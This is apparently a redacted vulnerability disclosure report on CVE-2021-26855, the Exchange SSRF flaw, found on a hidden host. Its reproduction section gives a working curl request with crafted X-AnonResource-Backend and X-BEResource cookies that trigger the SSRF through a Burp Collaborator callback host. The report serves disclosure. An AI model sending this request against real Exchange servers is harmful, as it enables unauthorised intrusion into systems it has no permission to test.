CVE-2021-26855 on ████████ resulting in SSRF

**Description:** ***CVE-2021-26855*** exists on ***███████ resulting*** in SSRF ## References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855 ## Impact Server Side Request Frogery ## System Host(s) ███████ ## Affected Product(s) and Version(s) ## CVE Numbers CVE-2021-26855 ## Steps to Reproduce ``` curl -i -s -k -X $'GET' \ -H $'Host: █████' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:86.0) Gecko/20100101 Firefox/86.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ -b $'X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3' \ $'https://████████/owa/auth/x.js' ``` OUTPUT: ██████████ ## Suggested Mitigation/Remediation Actions